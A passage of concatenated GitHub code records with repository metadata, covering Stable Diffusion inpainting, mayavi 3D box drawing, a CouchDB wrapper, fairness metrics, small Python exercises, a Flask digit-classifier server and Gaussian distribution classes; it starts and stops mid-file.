crop_for_filling_pre(img, mask)\n img_crop_filled = pipe(\n prompt=text_prompt,\n image=Image.fromarray(img_crop),\n mask_image=Image.fromarray(mask_crop),\n generator=generator\n ).images[0]\n img_filled = crop_for_filling_post(img, mask, np.array(img_crop_filled))\n return img_filled\n\ndef replace_img_with_sd(\n img: np.ndarray,\n mask: np.ndarray,\n text_prompt: str,\n step: int = 50,\n device=\"cuda\"\n):\n pipe = StableDiffusionInpaintPipeline.from_pretrained(\n \"stabilityai/stable-diffusion-2-inpainting\",\n torch_dtype=torch.float32,\n ).to(device)\n img_padded, mask_padded, padding_factors = resize_and_pad(img, mask)\n generator = torch.Generator(\"cuda\").manual_seed(0)\n pipe.scheduler = DPMSolverMultistepScheduler.from_config(pipe.scheduler.config)\n img_padded = pipe(\n prompt=text_prompt,\n image=Image.fromarray(img_padded),\n mask_image=Image.fromarray(255 - mask_padded),\n num_inference_steps=step,\n generator=generator\n ).images[0]\n height, width, _ = img.shape\n img_resized, mask_resized = recover_size(\n np.array(img_padded), mask_padded, (height, width), padding_factors)\n mask_resized = np.expand_dims(mask_resized, -1) / 255\n img_resized = img_resized * (1-mask_resized) + img * mask_resized\n return img_resized","repo_name":"kangmin5133/demolab","sub_path":"service/stable_diffusion.py","file_name":"stable_diffusion.py","file_ext":"py","file_size_in_byte":9885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12811319655","text":"import mayavi.mlab as mlab\nimport numpy as np\nimport torch\n\nbox_colormap = [\n [1, 1, 1],\n [0, 1, 0],\n [0, 1, 1],\n [1, 1, 0],\n]\n\n\"\"\" def visualize_pts(pts, fig=None, bgcolor=(0, 0, 0), fgcolor=(1.0, 1.0, 1.0),\n show_intensity=False, size=(600, 600), draw_origin=True):\n if not isinstance(pts, np.ndarray):\n pts = pts.cpu().numpy()\n if fig is None:\n fig = mlab.figure(figure=None, bgcolor=bgcolor, fgcolor=fgcolor, engine=None, size=size)\n\n if show_intensity:\n G = mlab.points3d(pts[:, 0], pts[:, 1], pts[:, 2], pts[:, 3], mode='point',\n colormap='gnuplot', scale_factor=1, figure=fig)\n else:\n G = mlab.points3d(pts[:, 0], pts[:, 1], pts[:, 2], mode='point',\n colormap='gnuplot', scale_factor=1, figure=fig)\n if draw_origin:\n mlab.points3d(0, 0, 0, color=(1, 1, 1), mode='cube', scale_factor=0.2)\n mlab.plot3d([0, 3], [0, 0], [0, 0], color=(0, 0, 1), tube_radius=0.1)\n mlab.plot3d([0, 0], [0, 3], [0, 0], color=(0, 1, 0), tube_radius=0.1)\n mlab.plot3d([0, 0], [0, 0], [0, 3], color=(1, 0, 0), tube_radius=0.1)\n\n return fig \"\"\"\ndef visualize_pts( fig=None, bgcolor=(0, 0, 0), fgcolor=(1.0, 1.0, 1.0),\n show_intensity=False, size=(600, 600), draw_origin=True):\n if fig is None:\n fig = mlab.figure(figure=None, bgcolor=bgcolor, fgcolor=fgcolor, engine=None, size=size)\n return fig\n\ndef draw_grid(x1, y1, x2, y2, fig, tube_radius=None, color=(0.5, 0.5, 0.5)):\n mlab.plot3d([x1, x1], [y1, y2], [0, 0], color=color, tube_radius=tube_radius, line_width=1, figure=fig)\n mlab.plot3d([x2, x2], [y1, y2], [0, 0], color=color, tube_radius=tube_radius, line_width=1, figure=fig)\n mlab.plot3d([x1, x2], [y1, y1], [0, 0], color=color, tube_radius=tube_radius, line_width=1, figure=fig)\n mlab.plot3d([x1, x2], [y2, y2], [0, 0], color=color, tube_radius=tube_radius, line_width=1, figure=fig)\n return fig\n\ndef draw_multi_grid_range(fig, grid_size=20, bv_range=(-60, -60, 60, 60)):\n for x in range(bv_range[0], bv_range[2], grid_size):\n for y in range(bv_range[1], bv_range[3], grid_size):\n fig = draw_grid(x, y, x + grid_size, y + grid_size, fig)\n\n return fig\n\n\ndef draw_corners3d(corners3d, fig, color=(1, 1, 1), line_width=2, cls=None, tag='', max_num=500, tube_radius=None):\n \"\"\"\n :param corners3d: (N, 8, 3)\n :param fig:\n :param color:\n :param line_width:\n :param cls:\n :param tag:\n :param max_num:\n :return:\n \"\"\"\n import mayavi.mlab as mlab\n num = min(max_num, len(corners3d))\n for n in range(num):\n b = corners3d[n] # (8, 3)\n\n if cls is not None:\n if isinstance(cls, np.ndarray):\n mlab.text3d(b[6, 0], b[6, 1], b[6, 2], '%.2f' % cls[n], scale=(0.3, 0.3, 0.3), color=color, figure=fig)\n else:\n mlab.text3d(b[6, 0], b[6, 1], b[6, 2], '%s' % cls[n], scale=(0.3, 0.3, 0.3), color=color, figure=fig)\n\n for k in range(0, 4):\n i, j = k, (k + 1) % 4\n mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [b[i, 2], b[j, 2]], color=color, tube_radius=tube_radius,\n line_width=line_width, figure=fig)\n\n i, j = k + 4, (k + 1) % 4 + 4\n mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [b[i, 2], b[j, 2]], color=color, tube_radius=tube_radius,\n line_width=line_width, figure=fig)\n\n i, j = k, k + 4\n mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [b[i, 2], b[j, 2]], color=color, tube_radius=tube_radius,\n line_width=line_width, figure=fig)\n\n i, j = 0, 5\n mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [b[i, 2], b[j, 2]], color=color, tube_radius=tube_radius,\n line_width=line_width, figure=fig)\n i, j = 1, 4\n mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [b[i, 2], b[j, 2]], color=color, tube_radius=tube_radius,\n line_width=line_width, figure=fig)\n\n return fig\n\nref_3d=torch.tensor([[\n [ 8.9112e+00, -2.0012e+00, -1.6553e+00],\n [ 8.9581e+00, -3.7104e+00, -1.6553e+00],\n [ 4.5004e+00, -3.8325e+00, -1.6553e+00],\n [ 4.4536e+00, -2.1233e+00, -1.6553e+00],\n [ 8.9112e+00, -2.0012e+00, -9.2259e-02],\n [ 8.9581e+00, -3.7104e+00, -9.2259e-02],\n [ 4.5004e+00, -3.8325e+00, -9.2259e-02],\n [ 4.4536e+00, -2.1233e+00, -9.2259e-02]],\n\n [[19.81525572,5.33127839 -1.95964969],\n [19.83589252,6.99598226,-1.95812453],\n [23.66489796,6.94881179,-1.95173037],\n [23.64426116,5.28410792,-1.95325554],\n [19.81284305,5.32999331,-0.52435224],\n [19.83347984,6.99469718,-0.52282708],\n [23.66248529,6.94752671,-0.51643292],\n [23.641848,5.28282284,-0.51795809]]]\n)\nref_corners3d=ref_3d.numpy()\n\nlabels=torch.tensor([1,1])\nref_labels=labels.numpy()\n\nscores=torch.tensor([0.9942,0.9981])\nref_scores=scores.numpy()\nfig = visualize_pts()\nfig = draw_multi_grid_range(fig, bv_range=(0, -40, 80, 40))\n\nfor k in range(ref_labels.min(), ref_labels.max() + 1):\n cur_color = tuple(box_colormap[k % len(box_colormap)])\n mask = (ref_labels == k)\n fig = draw_corners3d(ref_corners3d[mask], fig=fig, color=cur_color, cls=ref_scores[mask], max_num=100)\n\nmlab.show(stop=True)","repo_name":"qingping08/lidar-velodyne-detect","sub_path":"draw_scene_test.py","file_name":"draw_scene_test.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33024442334","text":"import couchdb\nimport dotenv\nimport os\nimport re\nfrom logger import logger\n\ndotenv.load_dotenv()\n\nCOUCHDB_HOST = os.environ['COUCHDB_HOST']\nCOUCHDB_PORT = os.environ['COUCHDB_PORT']\nCOUCHDB_USERNAME = os.environ['COUCHDB_USERNAME']\nCOUCHDB_PASSWORD = os.environ['COUCHDB_PASSWORD']\n\nclass CouchDB:\n def __init__(self, dbname, host=COUCHDB_HOST, port=COUCHDB_PORT,\n username=COUCHDB_USERNAME, password=COUCHDB_PASSWORD):\n self.host = host\n self.port = port\n self.username = username\n self.password = password\n\n self.instance_url = f\"http://{self.username}:{self.password}@{self.host}:{self.port}\"\n self.server = couchdb.Server(self.instance_url)\n self.db = self.get_or_create_database(dbname)\n\n def __repr__(self):\n return f\"{self.server} - {self.db}\"\n\n def get_or_create_database(self, dbname):\n try:\n db = self.server.create(dbname)\n logger.info(f\"Database '{dbname}' created successfully.\")\n return db\n except couchdb.http.PreconditionFailed:\n logger.info(f\"Database '{dbname}' already exists.\")\n return self.server[dbname]\n\n def upload_document(self, data, verbose=False, check=False):\n doc_id = data.get('_id')\n \n if check:\n # Check if the document with the specified ID exists\n existing_doc = self.get_document(doc_id)\n if existing_doc:\n # Get the current revision of the existing document\n data['_rev'] = existing_doc['_rev']\n\n # Save the new or updated document\n doc_id, doc_rev = self.db.save(data)\n \n if verbose:\n logger.info(f\"Document uploaded with ID: {doc_id}\", end='\\r')\n \n return doc_id\n \n def upload_bulk_documents(self, data_list, verbose=False):\n # Get the current revision of the existing documents\n # for data in data_list:\n # doc_id = data.get('_id')\n # existing_doc = self.get_document(doc_id)\n # if existing_doc:\n # data['_rev'] = existing_doc['_rev']\n \n results = self.db.update(data_list)\n if verbose:\n logger.info(f\"{len(data_list)} documents uploaded in bulk.\")\n return results\n\n def get_document(self, doc_id):\n try:\n doc = self.db[doc_id]\n return doc\n except couchdb.http.ResourceNotFound:\n logger.info(f\"Document with ID '{doc_id}' not found.\", end='\\n')\n return None\n\n def delete_document(self, doc_id):\n try:\n doc = self.db[doc_id]\n self.db.delete(doc)\n logger.info(f\"Document with ID '{doc_id}' deleted successfully.\")\n except couchdb.http.ResourceNotFound:\n logger.info(f\"Document with ID '{doc_id}' not found.\")\n\n def update_document(self, doc_id, updated_data):\n doc = self.get_document(doc_id)\n if doc:\n doc.update(updated_data)\n self.db.save(doc)\n logger.info(f\"Document with ID '{doc_id}' updated successfully.\")\n else:\n logger.info(f\"Document with ID '{doc_id}' not found.\")\n\n def list_documents(self, limit=1):\n try:\n result = self.db.view(\"_all_docs\", descending=True, limit=limit)\n latest_doc_id = result.rows[0].id\n latest_doc = self.get_document(latest_doc_id)\n return [latest_doc] if latest_doc else []\n except couchdb.http.ResourceNotFound:\n logger.info(\"No documents found.\")\n return []\n \n def get_document_by_id(self, doc_id):\n doc = self.get_document(doc_id)\n if doc:\n return dict(doc)\n else:\n return None\n\n def extract_and_get_data(self, response):\n match = re.search(r\"'tid':\\s*(\\d+)\", response)\n return match.group(1)\n\n def get_last_tid(self):\n response = str(self.list_documents()[0])\n logger.info(response)\n return self.extract_and_get_data(response)\n\n","repo_name":"rNLKJA/Unimelb-Master-2023-COMP90024-Assignment-2","sub_path":"1_Flask_Backend/harvester/mastodon/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"15088498651","text":"import numpy as np\nimport torch\nfrom sklearn.metrics import f1_score, roc_auc_score\n\nimport copy\n\nclass AverageVarMeter(object):\n def __init__(self):\n self.reset()\n def reset(self):\n self.val=0\n self.sum2 = 0\n self.avg=0\n self.sum=0\n self.count=0\n\n def update(self,val,n=1):\n self.val = val\n self.sum2 += (val**2)*n\n self.sum +=val*n\n self.count +=n\n self.avg = self.sum / self.count\nclass LogsAVG:\n def __init__(self, logs_list):\n self.logs_list = logs_list\n self.train = {}\n self.test = {}\n self.res_cat = logs_list[0].res_cat\n self.crit_list = logs_list[0].crit_list\n\n self.initialize() \n self._get_average()\n self._obtain_worst_perf('train')\n self._obtain_worst_perf('test')\n\n \n def initialize(self,crit_list=None):\n if crit_list is None:\n crit_list = self.crit_list\n \n for cat in self.res_cat:\n self.train[cat] = {}\n self.test[cat] = {}\n for cl in crit_list:\n self.train[cat][cl] = []\n self.test[cat][cl] = []\n\n def _get_average(self): \n for cat in self.res_cat:\n for cl in self.crit_list:\n for lgc in self.logs_list:\n self.train[cat][cl].append(torch.tensor(lgc.train[cat][cl]).flatten())\n self.test[cat][cl].append(torch.tensor(lgc.test[cat][cl]).flatten())\n# print(torch.stack(self.train[cat][cl],dim=0))\n self.train[cat][cl] = torch.mean(torch.stack(self.train[cat][cl],dim=0), dim=0)\n self.test[cat][cl] = torch.mean(torch.stack(self.test[cat][cl],dim=0), dim=0)\n \n \n def _obtain_worst_perf(self, mode = 'train', return_val = False):\n if mode == 'train':\n logs = self.train\n elif mode == 'test':\n logs = self.test\n else:\n print(\"not implementation error\")\n \n logs['w'] = {}\n res_keys = list(logs['all'].keys())\n num_data = len(logs['all'][res_keys[0]])\n \n for cl in res_keys:\n logs['g0'][cl] = torch.tensor(logs['g0'][cl])\n logs['g1'][cl] = torch.tensor(logs['g1'][cl])\n if cl == 'loss':\n logs['w'][cl] = torch.max(logs['g0'][cl],logs['g1'][cl])\n else:\n logs['w'][cl] = torch.min(logs['g0'][cl],logs['g1'][cl])\n if return_val:\n return logs['w']\n else:\n return\n \nclass LogsCLS:\n def __init__(self,res_cat = ['all','g0','g1'],\n crit_list = ['acc','loss','weighted','micro','macro','roc_auc']):\n self.crit_list = crit_list\n self.res_cat = res_cat\n self.train = {}\n self.test = {}\n self.initialize()\n \n def initialize(self,crit_list=None):\n if crit_list is None:\n crit_list = self.crit_list\n \n for cat in self.res_cat:\n self.train[cat] = {}\n self.test[cat] = {}\n for cl in crit_list:\n self.train[cat][cl] = []\n self.test[cat][cl] = []\n \n def append_result(self, res_dic_list, mode = 'train'):\n if mode == 'train':\n logs = self.train\n elif mode == 'test':\n logs = self.test\n else:\n print(\"not implementation error\")\n \n for it,res_dic in enumerate(res_dic_list): \n for rk in res_dic.keys():\n logs[self.res_cat[it]][rk].append(res_dic[rk])\n \n def obtain_worst_perf(self, mode = 'train'):\n if mode == 'train':\n logs = self.train\n elif mode == 'test':\n logs = self.test\n else:\n print(\"not implementation error\")\n \n logs['w'] = {}\n res_keys = list(logs['all'].keys())\n num_data = len(logs['all'][res_keys[0]])\n \n for cl in res_keys:\n logs['g0'][cl] = torch.tensor(logs['g0'][cl])\n logs['g1'][cl] = torch.tensor(logs['g1'][cl])\n if cl == 'loss':\n logs['w'][cl] = torch.maximum(logs['g0'][cl],logs['g1'][cl])\n else:\n logs['w'][cl] = torch.minimum(logs['g0'][cl],logs['g1'][cl])\n return logs['w']\n\n \n \ndef binary_scores(output, target, prob=True, thres = 0.5):\n score_dic = {}\n if prob:\n pred = torch.tensor(output>thres, dtype=torch.float32)\n else:\n pred = output\n score_dic['weighted'] = f1_score(target, pred, average='weighted')*100\n score_dic['macro'] = f1_score(target, pred, average='macro')*100\n score_dic['micro'] = f1_score(target, pred, average='micro')*100\n score_dic['accuracy'] = accuracy_b(pred, target).item()\n score_dic['roc_auc'] = roc_auc_score(target,output)*100\n \n print('weighted: ', score_dic['weighted'])\n print('macro: ',score_dic['macro'])\n print('micro: ',score_dic['micro']) \n print('accuracy: ', score_dic['accuracy']) \n if prob:\n print(\"roc auc: \", score_dic['roc_auc'])\n return score_dic\n \ndef accuracy(output, target, topk=(1,)):\n '''Compute the top1 and top k error'''\n maxk = max(topk)\n batch_size = target.size(0)\n _,pred = output.topk(maxk,1,True,True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul(100.0 / batch_size))\n return res\n\ndef accuracy_b(output, target, thr = 0.5):\n '''Compute the top1 and top k error'''\n \n batch_size = target.size(0)\n pred = torch.tensor(output>thr,dtype = torch.float32)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n \n correct_k = correct.view(-1).float().sum(0)\n res=correct_k.mul(100.0 / batch_size)\n \n return res","repo_name":"psr6275/fairness_AL","sub_path":"codes/utils/eval_utils.py","file_name":"eval_utils.py","file_ext":"py","file_size_in_byte":6020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74921037227","text":"import os\n\nif os.name == \"posix\":\n os.system(\"clear\")\nelse:\n os.system(\"cls\")\n\n\n# Question 3 on Multiple List Comprehension\n\n# Use list comprehension to make a list that has the entries as all\n# possible sums of the elements in the lists [3, 5, 6] and [10, 13, 27],\n# i.e. [13, 16, 30, 15, 18, 32, 16, 19, 33]\n\ndef sumList(list1, list2):\n\n result = []\n\n for i in list1:\n for j in list2:\n result.append(i + j)\n\n return result\n\n# result = [n for n in range(0, 16) if (n**2 - 2*n + 1) % 3 == 0]\n\n\na = [3, 5, 6]\nb = [10, 13, 27]\n\nresult = [x + y for x in a for y in b]\n\nprint(result)\nassert result == [13, 16, 30, 15, 18, 32, 16, 19, 33]\n","repo_name":"Omortis/hw502","sub_path":"lec7-live/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74227729068","text":"# WRITE YOUR SOLUTION HERE:\ndef most_common_words(filename: str, lower_limit: int):\n helper = {}\n helper2 = []\n with open(filename) as file:\n for line in file:\n helper2.append(line.strip().split(\" \"))\n for list in helper2:\n for item in list:\n if(\".\" in item or \",\" in item):\n item = item[:-1]\n if item not in helper:\n helper[item] = 1\n else:\n helper[item] += 1\n return {word: amount for word, amount in helper.items() if amount >= lower_limit}\n\n## Example solution\nfrom string import punctuation\n \ndef most_common_words(filename: str, lower_limit: int):\n with open(filename) as f:\n content = f.read()\n \n # remove line breaks and punctuation\n content = content.replace(\"\\n\", \" \")\n for punctuation_mark in punctuation:\n content = content.replace(punctuation_mark, \"\")\n \n words = content.split(\" \")\n return {word: words.count(word) for word in words if words.count(word) >= lower_limit}","repo_name":"paavkar/Python-Programming-MOOC-2023","sub_path":"Part 11/part11-12_most_common_words/src/most_common_words.py","file_name":"most_common_words.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32959723626","text":"# enter ```ssh -R 80:localhost:3000 ssh.localhost.run``` to make local host publically exposed, but\n# beware: this isn't a secure connection \n \nfrom flask import Flask, request\nimport os\n\nimport numpy as np\nimport cv2\nimport tensorflow as tf\n\nimg_base_path = \"./server-received-capture\"\n\nimg_processed_base_path = './processed-picture'\nimg_processed_path = img_processed_base_path + \".jpg\"\n\n# functions\ndef processImg(img_path):\n\t# dimensions to shrink RPI picture to\n\tsize = (28, 28)\n\n\tgray = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)\n\t#cv2.imshow('gray', gray)\n\t#cv2.waitKey(0)\n\n\t#thresh = 127\n\tthresh = 70\n\tbw = cv2.threshold(gray, thresh, 255, cv2.THRESH_BINARY)[1]\n\n#\tcv2.imshow('bw', bw)\n#\tcv2.waitKey(0)\n\n\tsmoll_bw = cv2.resize(255-bw, size)\n#\tcv2.imshow('smoll bw', smoll_bw)\n#\tcv2.waitKey(0)\n\n\tcv2.destroyAllWindows()\n\n\tsmoll_bw = smoll_bw.flatten() / 255.0\n\treturn smoll_bw\n\n\napp = Flask(__name__)\n\n\n@app.route('/', methods = ['GET', 'POST'])\ndef index():\n\tif request.method == 'GET':\n\t\treturn \"Hello World!\"\n\tif request.method == 'POST':\n\t\tprint(\"processing...\")\n\t\tprediction = ''\n\t\t#print(request.data)\n\n\t\timg_path = img_base_path + \".jpg\"\n\t\timg_fd = os.open(img_path, os.O_WRONLY | os.O_CREAT)\n\t\tos.write(img_fd, (request.data)) \n\t\tos.close(img_fd)\n\n\t\twith tf.Session() as sess:\n\t\t\tnew_saver = tf.train.import_meta_graph('./tensorflow-demo/my_test_model-1000.meta')\n\t\t\tnew_saver.restore(sess, tf.train.latest_checkpoint('./tensorflow-demo/'))\n\n\t\t\tgraph = tf.get_default_graph()\n\t\t\tX = graph.get_tensor_by_name(\"X:0\")\n\t\t\tY = graph.get_tensor_by_name(\"Y:0\")\n\n\t\t\t# manipulate single image\n\t\t\timg = processImg(img_path)\n\n\t\t\top_to_restore = graph.get_tensor_by_name(\"output:0\")\n\n\t\t\t# generate prediction on single image\n\t\t\tprediction = sess.run(tf.argmax(op_to_restore, 1), feed_dict={X: [img]})\n\t\t\tprediction = str( np.squeeze(prediction) )\n\t\t\tprint(\"Prediction for test image:\", prediction)\n\t\t\treturn prediction\n\napp.run(port=3000)\n","repo_name":"michaelhtleung/handwritten-number-classifier","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39517653017","text":"import numpy as np\nimport scipy\nimport scipy.linalg\nimport scipy.stats\n\n\nclass MeanConditionalNormal:\n\n def __init__(self, mua, cova, linear, bias, covcond):\n self.mua = mua\n self.cova = cova\n self.linear = linear\n self.bias = bias\n self.covcond = covcond\n\n def to_natural(self):\n # exactly the same formulas as natural to mean\n # those parametrizations are symmetric\n preca = np.linalg.inv(self.cova)\n preccond = np.linalg.inv(self.covcond)\n etaa = preca @ self.mua\n linear = preccond @ self.linear\n bias = preccond @ self.bias\n return NaturalConditionalNormal(etaa, preca, linear, bias, preccond)\n\n def to_joint(self):\n mub = np.dot(self.linear, self.mua) + self.bias\n mean = np.concatenate([self.mua, mub], axis=0)\n\n d = self.mua.shape[0]\n crosscov = np.dot(self.cova, self.linear.T)\n cov = np.zeros([2 * d, 2 * d])\n cov[:d, :d] = self.cova\n cov[:d, d:] = crosscov\n cov[d:, :d] = crosscov.T\n cov[d:, d:] = self.covcond + np.linalg.multi_dot([\n self.linear, self.cova, self.linear.T])\n\n return MeanJointNormal(mean, cov)\n\n def sample(self, n):\n aa = np.random.multivariate_normal(self.mua, self.cova, size=n)\n bb = np.dot(aa, self.linear.T) \\\n + np.random.multivariate_normal(self.bias, self.covcond, size=n)\n return aa, bb\n\n\nclass MeanJointNormal:\n\n def __init__(self, mean, cov):\n self.mean = mean\n self.cov = cov\n\n def to_natural(self):\n precision = np.linalg.inv(self.cov)\n return NaturalJointNormal(precision @ self.mean, precision)\n\n def to_conditional(self):\n d = self.mean.shape[0] // 2\n\n # parameters of marginal on A\n mua = self.mean[:d]\n cova = self.cov[:d, :d]\n preca = np.linalg.inv(cova)\n\n # intermediate values required for calculus\n mub = self.mean[d:]\n covb = self.cov[d:, d:]\n crosscov = self.cov[:d, d:]\n\n # parameters of conditional\n linear = np.dot(crosscov.T, preca)\n bias = mub - np.dot(linear, mua)\n covcond = covb - np.linalg.multi_dot([linear, cova, linear.T])\n\n return MeanConditionalNormal(mua, cova, linear, bias, covcond)\n\n def sample(self, n):\n return np.random.multivariate_normal(self.mean, self.cov, size=n)\n\n def encode(self, encoder):\n mu = np.dot(encoder, self.mean)\n cov = np.linalg.multi_dot([encoder, self.cov, encoder.T])\n return MeanJointNormal(mu, cov)\n\n\nclass NaturalJointNormal:\n\n def __init__(self, eta, precision):\n self.eta = eta\n self.precision = precision\n\n def to_mean(self):\n cov = np.linalg.inv(self.precision)\n return MeanJointNormal(cov @ self.eta, cov)\n\n def to_cholesky(self):\n L = np.linalg.cholesky(self.precision)\n zeta = scipy.linalg.solve_triangular(L, self.eta, lower=True)\n return CholeskyJointNormal(zeta, L)\n\n def to_conditional(self):\n d = self.eta.shape[0] // 2\n # conditional parameters\n preccond = self.precision[d:, d:]\n linear = - self.precision[d:, :d]\n bias = self.eta[d:]\n\n # marginal parameters\n tmp = linear.T @ np.linalg.inv(preccond)\n preca = self.precision[:d, :d] - tmp @ linear\n etaa = self.eta[:d] + tmp @ bias\n return NaturalConditionalNormal(etaa, preca, linear, bias, preccond)\n\n def reverse(self):\n d = self.eta.shape[0] // 2\n eta = np.roll(self.eta, d)\n precision = np.roll(self.precision, shift=[d, d], axis=[0, 1])\n return NaturalJointNormal(eta, precision)\n\n @property\n def logpartition(self):\n s, logdet = np.linalg.slogdet(self.precision)\n assert s == 1\n return self.eta.T @ np.linalg.solve(self.precision, self.eta) - logdet\n\n def negativeloglikelihood(self, x):\n \"\"\"Return the NLL of each point in x.\n x is a n*2dim array where each row is a datapoint.\n \"\"\"\n linearterm = -x @ self.eta - np.sum((x @ self.precision) * x, axis=1)\n return linearterm + self.logpartition\n\n def distance(self, other):\n return np.sqrt(\n np.sum((self.eta - other.eta) ** 2)\n + np.sum((self.precision - other.precision) ** 2)\n )\n\n\nclass CholeskyJointNormal:\n\n def __init__(self, zeta, L):\n self.zeta = zeta\n self.L = L\n\n def to_natural(self):\n return NaturalJointNormal(\n eta=self.L @ self.zeta,\n precision=self.L @ self.L.T\n )\n\n def kullback_leibler(self, other):\n V = scipy.linalg.solve_triangular(self.L, other.L).T\n return (.5 * np.sum((V @ self.zeta - other.zeta) ** 2)\n + .5 * np.sum(V ** 2) - np.sum(np.log(np.diag(V))))\n\n\nclass NaturalConditionalNormal:\n \"\"\"Joint Gaussian distribution between a cause variable A and an effect variable B.\n\n B is a linear encoder of A plus gaussian noise.\n The relevant parameters to describe the joint distribution are the parameters of A,\n and the parameters of B given A.\n \"\"\"\n\n def __init__(self, etaa, preca, linear, bias, preccond):\n # marginal\n self.etaa = etaa\n self.preca = preca\n # conditional\n self.linear = linear\n self.bias = bias\n self.preccond = preccond\n\n def to_joint(self):\n tmp = np.linalg.solve(self.preccond, self.linear).T\n eta = np.concatenate([self.etaa - tmp @ self.bias, self.bias], axis=0)\n\n d = self.etaa.shape[0]\n precision = np.zeros([2 * d, 2 * d])\n precision[:d, :d] = self.preca + tmp @ self.linear\n precision[:d, d:] = - self.linear.T\n precision[d:, :d] = - self.linear\n precision[d:, d:] = self.preccond\n return NaturalJointNormal(eta, precision)\n\n def to_mean(self):\n cova = np.linalg.inv(self.preca)\n covcond = np.linalg.inv(self.preccond)\n mua = cova @ self.etaa\n linear = covcond @ self.linear\n bias = covcond @ self.bias\n return MeanConditionalNormal(mua, cova, linear, bias, covcond)\n\n def to_cholesky(self):\n la = np.linalg.cholesky(self.preca)\n lcond = np.linalg.cholesky(self.preccond)\n return CholeskyConditionalNormal(\n za=scipy.linalg.solve_triangular(la, self.etaa, lower=True),\n la=la,\n linear=scipy.linalg.solve_triangular(lcond, self.linear, lower=True),\n bias=scipy.linalg.solve_triangular(lcond, self.bias, lower=True),\n lcond=lcond\n )\n\n def intervention(self, on, interpolation):\n \"\"\"Sample natural parameters of a marginal distribution\n Substitute them in the cause or effect marginals.\n \"\"\"\n dim = self.etaa.shape[0]\n prec = wishart(dim)\n eta = np.random.multivariate_normal(np.zeros(dim), prec / 2 / dim)\n if on == 'cause':\n eta = (1 - interpolation) * self.etaa + interpolation * eta\n prec = (1 - interpolation) * self.preca + interpolation * prec\n return NaturalConditionalNormal(eta, prec, self.linear, self.bias, self.preccond)\n elif on == 'effect':\n # linear = (1 - interpolation) * self.linear\n linear = 0 * self.linear\n rev = self.reverse()\n bias = (1 - interpolation) * rev.etaa + interpolation * eta\n prec = (1 - interpolation) * rev.preca + interpolation * prec\n return NaturalConditionalNormal(self.etaa, self.preca, linear, bias, prec)\n elif on == 'mechanism':\n linear = (self.preccond @ np.random.randn(dim, dim) / np.sqrt(dim) * .95)\n linear = (1 - interpolation) * self.linear + interpolation * linear\n bias = (1 - interpolation) * self.bias + interpolation * eta\n return NaturalConditionalNormal(self.etaa, self.preca, linear, bias, self.preccond)\n\n def reverse(self):\n \"\"\"Return the ConditionalGaussian from B to A.\"\"\"\n return self.to_joint().reverse().to_conditional()\n\n def distance(self, other):\n \"\"\"Return Euclidean distance between self and other in natural parameter space.\"\"\"\n return np.sqrt(\n np.sum((self.etaa - other.etaa) ** 2)\n + np.sum((self.preca - other.preca) ** 2)\n + np.sum((self.linear - other.linear) ** 2)\n + np.sum((self.bias - other.bias) ** 2)\n + np.sum((self.preccond - other.preccond) ** 2)\n )\n\n @property\n def logpartition(self):\n return self.to_joint().logpartition\n\n\nclass CholeskyConditionalNormal:\n\n def __init__(self, za, la, linear, bias, lcond):\n self.za = za\n self.la = la\n self.linear = linear\n self.bias = bias\n self.lcond = lcond\n\n def to_natural(self):\n return NaturalConditionalNormal(\n etaa=np.dot(self.la, self.za),\n preca=np.dot(self.la, self.la.T),\n linear=np.dot(self.lcond, self.linear),\n bias=np.dot(self.lcond, self.bias),\n preccond=np.dot(self.lcond, self.lcond.T)\n )\n\n def distance(self, other):\n return np.sqrt(\n np.sum((self.za - other.za) ** 2)\n + np.sum((self.la - other.la) ** 2)\n + np.sum((self.linear - other.linear) ** 2)\n + np.sum((self.bias - other.bias) ** 2)\n + np.sum((self.lcond - other.lcond) ** 2)\n )\n\n\n# _____ _\n# | __ \\ (_)\n# | |__) | __ _ ___ _ __ ___\n# | ___/ '__| |/ _ \\| '__/ __|\n# | | | | | | (_) | | \\__ \\\n# |_| |_| |_|\\___/|_| |___/\ndef wishart(dim, scale=1):\n ans = scipy.stats.wishart(df=2 * dim + 2, scale=np.eye(dim) / dim * scale).rvs()\n if dim == 1:\n ans = np.array([[ans]])\n return ans\n\n\ndef sample_natural(dim, mode='conjugate', scale=10):\n \"\"\"Sample natural parameters of a ConditionalGaussian of dimension dim.\"\"\"\n\n if mode == 'naive':\n # parameters of marginal on A\n etaa = np.random.randn(dim)\n preca = wishart(dim)\n\n # parameters of conditional\n linear = np.random.randn(dim, dim)/ np.sqrt(dim) * .95\n bias = np.random.randn(dim)\n preccond = wishart(dim, scale)\n\n elif mode == 'conjugate':\n n0 = 2 * dim + 2\n preca = wishart(dim)\n preccond = wishart(dim, scale)\n\n etaa = np.random.multivariate_normal(np.zeros(dim), preca / n0)\n bias = np.random.multivariate_normal(np.zeros(dim), preccond / n0)\n\n linear = preccond @ np.random.randn(dim, dim) / np.sqrt(dim) * .95\n\n return NaturalConditionalNormal(etaa, preca, linear, 